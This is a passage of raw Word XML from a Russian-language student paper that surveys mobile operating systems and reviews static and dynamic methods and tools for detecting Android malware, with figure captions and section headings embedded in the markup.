        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F569EA" wp14:editId="71C913AA">
            <wp:extent cx="5753100" cy="318135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329BB" w:rsidRDefault="00A311F6" w:rsidP="00124ABE">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00124ABE">
        <w:rPr>
          <w:rStyle w:val="aff5"/>
        </w:rPr>
        <w:t>Темпы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> роста популярности операционных систем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007329BB" w:rsidRDefault="007329BB" w:rsidP="00C84DC3">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7329BB" w:rsidRPr="00015144" w:rsidRDefault="007329BB" w:rsidP="00C84DC3">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если рассмотреть статистику за 2020 год, то на рисунке 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A311F6" w:rsidRDefault="00D6194F" w:rsidP="00A311F6">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F6E3BEB" wp14:editId="7ACA331F">
            <wp:extent cx="5915025" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="9525"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29BB" w:rsidRDefault="00A311F6" w:rsidP="00A311F6">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Темпы роста популярности операционных систем в 2020 году</w:t>
      </w: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Pr="007329BB" w:rsidRDefault="007329BB" w:rsidP="00015144">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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0853C0" w:rsidRPr="00C84DC3" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc61505524"/>
      <w:r w:rsidRPr="00C84DC3">
        <w:t>Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Android – операционная система, разрабатываемая компанией Android Inc., которая была выкуплена компанией Google в июле 2005 года [4].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 xml:space="preserve">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доступную им версию данной мобильной операционной системы собственными функциями, возможностями и собственным </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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 xml:space="preserve">Опираясь на статистику, </w:t>
      </w:r>
      <w:r w:rsidR="00925558">
        <w:t xml:space="preserve">представленную на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00F61808">
        <w:t>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t>такие, как Windows [5].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0853C0" w:rsidRPr="00A66119" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc61505525"/>
      <w:r w:rsidRPr="00A66119">
        <w:t>iOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>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автомобильных систем Apple CarPlay. [6]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В ней используется ядро XNU, которое тоже производится компанией Apple.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pP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lastRenderedPageBreak/>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0853C0" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc61505526"/>
      <w:r>
        <w:t>Windows Phone</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>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окончательно прекращена ее поддержка. [7]</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 xml:space="preserve">В связи с вышесказанным, семейство ОС Windows не интересно для </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>рассмотрения в рамках данной работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="008365C2" w:rsidRDefault="00D6194F" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc61505527"/>
      <w:r>
        <w:t xml:space="preserve">Обоснование выбор ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в качестве целевой для изучения средств проведения поведенческого анализа</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Ввиду доступности системы, многие компании производят мобильные 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расходов, в сравнении с устройствами от компании Apple.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6194F" w:rsidRDefault="000853C0" w:rsidP="00D6194F">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">По итогу </w:t>
      </w:r>
      <w:r w:rsidR="001929D2">
        <w:t>анализа</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> наиболее популярных мобильных ОС можно сделать вывод, что </w:t>
      </w:r>
      <w:r w:rsidR="001929D2">
        <w:t xml:space="preserve">целесообразно, ввиду своей распространенности, выбрать в качестве целевой ОС </w:t>
      </w:r>
      <w:r w:rsidR="001929D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для поиска дополнительных средств обеспечения информационной безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6194F" w:rsidRPr="0018539E" w:rsidRDefault="00D6194F" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc61505528"/>
      <w:r>
        <w:t xml:space="preserve">Общие принципы функционирования ОС </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00D6194F" w:rsidRPr="004674FA" w:rsidRDefault="00D6194F" w:rsidP="00D6194F">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D6194F" w:rsidRDefault="00D6194F" w:rsidP="00D6194F">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D6194F" w:rsidRDefault="00D6194F" w:rsidP="00D6194F">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[8]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="00D6194F" w:rsidP="00FB15D4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>С точки зрения информационной безопасности, наиболее важными части APK-файла является его сигнатура, байт-код и ресурсы.</w:t>
      </w:r>
      <w:r w:rsidR="009D41FE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E2AFD" w:rsidRPr="00452CC4" w:rsidRDefault="00FE7F61" w:rsidP="009D41FE">
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc61505529"/>
      <w:r w:rsidRPr="009D41FE">
        <w:lastRenderedPageBreak/>
        <w:t>СПЕЦИАЛЬНЫЙ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7F61">
        <w:t xml:space="preserve"> РАЗДЕЛ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00452CC4" w:rsidRDefault="0027056C" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc61505530"/>
      <w:r w:rsidRPr="00452CC4">
        <w:t>Принципы анализа следов вредоносного ПО для ОС Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>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Pr="00F054DE" w:rsidRDefault="0027056C" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc61505531"/>
      <w:r w:rsidRPr="00F054DE">
        <w:t>Статический анализ вредоносного ПО для андроид</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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 xml:space="preserve">Каталог операционного кода (содержащий файлы с </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">расширением </w:t>
      </w:r>
      <w:r w:rsidRPr="003843B4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.smali</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,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687DF7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc61505532"/>
      <w:r>
        <w:t>Динамический анализ вредоносного ПО для андроид</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="0027056C" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Обычно, для проведения динамического анализа прибегают к использованию вспомогательных средств, собирающих информацию, а </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>иногда и статистику, функционирования приложения и системы во время работы приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="0027056C" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>еш-сумму APK-файла (прибегая к алгоритмам х</w:t>
      </w:r>
      <w:r>
        <w:t>еширования MD5, SHA-1, SHA-256),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00206016" w:rsidRDefault="00C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>ведения о полученны</w:t>
      </w:r>
      <w:r>
        <w:t>х и отправленных по сети данных,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00206016" w:rsidRDefault="00C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>ведения об о</w:t>
      </w:r>
      <w:r>
        <w:t>перациях чтения и записи файлов,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00206016" w:rsidRDefault="00C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>ведения о запущенны</w:t>
      </w:r>
      <w:r>
        <w:t>х службах и загруженных классах,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00206016" w:rsidRDefault="00C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>ведения о сборе и отправке поль</w:t>
      </w:r>
      <w:r>
        <w:t>зовательских данных,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00206016" w:rsidRDefault="00C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>ведения о разрешени</w:t>
      </w:r>
      <w:r>
        <w:t>ях, которое получило приложение,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00206016" w:rsidRDefault="00C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>ведения о криптографических операциях, производимых пр</w:t>
      </w:r>
      <w:r>
        <w:t>иложением с помощью Android API,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="00206016" w:rsidRDefault="00C90951" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>ведения об отправляем</w:t>
      </w:r>
      <w:r>
        <w:t>ых SMS-сообщениях и осуществляе</w:t>
      </w:r>
      <w:r w:rsidR="0027056C" w:rsidRPr="00206016">
        <w:t>мых вызовах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="0027056C" w:rsidP="0027056C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>В результате работы программы будет получен файл в формате JSON, содержащий вышеперечисленные сведения. [8]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="0027056C" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc61505533"/>
      <w:r>
        <w:t>Этапы анализа следов предположительно вредоносного ПО в ОС Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="0027056C" w:rsidP="003F046F">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Подводя итог по описанным ме</w:t>
      </w:r>
      <w:r w:rsidR="00C90951">
        <w:t>тодам анализа приложения для An</w:t>
      </w:r>
      <w:r>
        <w:t>droid, можно составить схему поэтапного проведения анализа программы с целью обнаружения следов вредоносного ПО:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="00C90951" w:rsidP="003F046F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="0027056C">
        <w:t>сследование уст</w:t>
      </w:r>
      <w:r>
        <w:t>ановленных в системе приложений,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="00C90951" w:rsidP="003F046F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="0027056C">
        <w:t>дентификация пот</w:t>
      </w:r>
      <w:r>
        <w:t>енциально вредоносной программы,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="00C90951" w:rsidP="003F046F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="0027056C">
        <w:t>реодоление мер противодействия</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> криминалистическому анализу ПО,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="00C90951" w:rsidP="003F046F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidR="0027056C">
        <w:t>инамический анализ программ</w:t>
      </w:r>
      <w:r>
        <w:t>ы,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="00C90951" w:rsidP="003F046F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Статический анализ программы,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6194F" w:rsidRPr="0027056C" w:rsidRDefault="00C90951" w:rsidP="003F046F">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="0027056C">
        <w:t>ыделение потенциально опасных фрагментов кода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc61505534"/>
      <w:r>
        <w:t>Выделение каналов утечки информации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRPr="0027056C" w:rsidRDefault="0027056C" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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действий пользователя, с целью предотвращения утечек информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Наиболее популярным каналом утечки корпоративной информации является инсайдер, то</w:t>
      </w:r>
      <w:r w:rsidR="00713EA3">
        <w:t xml:space="preserve"> есть сотрудник организации, посредство</w:t>
      </w:r>
      <w:r>
        <w:t>м раскрытия закрытой информации внешнему нарушителю, с целью передачи конечной информации или предоставления ему несанкционированного доступа в систему из вне.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">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853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Помимо нарушения ИБ самим инсайдером, существует не менее популярный способ ее нарушения – социальная инженерия, с помощью которой внешний нарушитель может так же получить доступ к секретной информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">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18539E" w:rsidRDefault="000853C0" w:rsidP="0018539E">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidR="00610D8C">
        <w:t xml:space="preserve">, который может быть </w:t>
      </w:r>
      <w:r w:rsidR="0018539E">
        <w:t>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может быть нарушена по акустическим, вибрационным, электрическим и прочим каналам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc61505535"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Обнаружение вредоносных приложений для Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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реконструкция действий злоумышленника с целью поиска способов устранения уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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0853C0" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc61505536"/>
      <w:r>
        <w:t xml:space="preserve">Методы, </w:t>
      </w:r>
      <w:r w:rsidR="00D600A4">
        <w:t>затрудняющие</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> криминалистический анализ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Существует четыре наиболее распространенных метода </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>противодействия криминалистическому исследованию:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="00C90951" w:rsidP="00206016">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>обфускация,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="00C90951" w:rsidP="00206016">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>шифрование символьных строк,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="00C90951" w:rsidP="00206016">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="000853C0">
        <w:t>ротиводейств</w:t>
      </w:r>
      <w:r>
        <w:t>ие декомпиляции,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="00C90951" w:rsidP="00206016">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="000853C0">
        <w:t>роверка окружения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc61505537"/>
      <w:r>
        <w:t>Обфускация</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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687DF7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc61505538"/>
      <w:r>
        <w:t>Шифрование символьных строк</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>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687DF7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc61505539"/>
      <w:r>
        <w:t>Проверка окружения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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853C0" w:rsidRDefault="000853C0" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc61505540"/>
      <w:r>
        <w:t>Обзор средств проведения динамического анализа приложений для Android</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>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w:t>
      </w:r>
      <w:r w:rsidR="00C90951">
        <w:t>ичной информацией пользователей;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00206016">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>Самоанализ виртуальных машин (VMI): инфраструктуры на основе VMI [9] перехватывают события, происходящие в эмулируемой среде. Системы на основе Dalvik VMI отслеживают выполнение Android API поср</w:t>
      </w:r>
      <w:r w:rsidR="001354A0">
        <w:t>едством модификаций в Dalvik VM;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00206016">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:r w:rsidR="001354A0">
        <w:t>но) отслеживать собственный код;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00206016">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r>
        <w:t>Трассировка методов: платформы могут отслеживать вызовы Java</w:t>
      </w:r>
      <w:r w:rsidR="001354A0">
        <w:t>-методов приложения в Dalvik VM;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00A66119">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Популярный фреймворк для отслеживания заражений – TaintDroid [10]. TaintDroid реализован на виртуальной машине Dalvik и мониторах заявки на утечку конфиденциальной информации. Однако, ScrubDroid [11] представил ряд атак для обхода динамического анализа заражения. VetDroid [12] – это динамический фреймворк, который измеряет фактическое поведение при использовании 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124ABE">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На рисунке </w:t>
      </w:r>
      <w:r w:rsidR="003830E4">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> изображена схема работы Crowdroid [13],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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>к ошибк</w:t>
      </w:r>
      <w:r w:rsidR="00124ABE">
        <w:t xml:space="preserve">ам неправильной классификации. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A311F6" w:rsidRDefault="00A66119" w:rsidP="00A311F6">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="00630BBD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>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207" cy="2609314"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66119" w:rsidRDefault="00A311F6" w:rsidP="00124ABE">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
